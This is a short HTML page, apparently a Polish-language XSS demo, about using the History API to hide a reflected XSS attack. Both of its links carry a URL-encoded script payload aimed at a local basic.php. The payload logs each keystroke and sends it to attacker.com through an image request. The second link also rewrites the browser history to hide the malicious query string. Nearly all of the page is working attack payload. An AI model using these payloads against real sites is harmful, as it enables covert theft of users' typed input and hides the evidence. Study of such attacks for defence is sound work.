<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>History API - ukrywanie ataku Reflective XSS</title>
	<link rel="stylesheet" href="">
</head>
<body>
	<a href="../xss/basic.php?email=%3Cscript%3E$(document).keypress(function(){$(%22%3Cimg%20src=http://attacker.com/log.png?key=%22%20%2b%20String.fromCharCode(event.which)%2b%22%26time=%22%2bDate.now()%2b%22%20/%3E%22)});%3C/script%3E">XSS Payload z keyloggerem</a>
	<br />
	<a href="../xss/basic.php?email=%3Cscript%3Ehistory.pushState({},'',location.href.split('%3f').shift())%3b$(document).keypress(function(){$(%22%3Cimg%20src=http://attacker.com/log.png?key=%22%20%2b%20String.fromCharCode(event.which)%2b%22%26time=%22%2bDate.now()%2b%22%20/%3E%22)});%3C/script%3E">XSS Payload z keyloggerem i "zatarciem śladów"</a>
</body>
</html>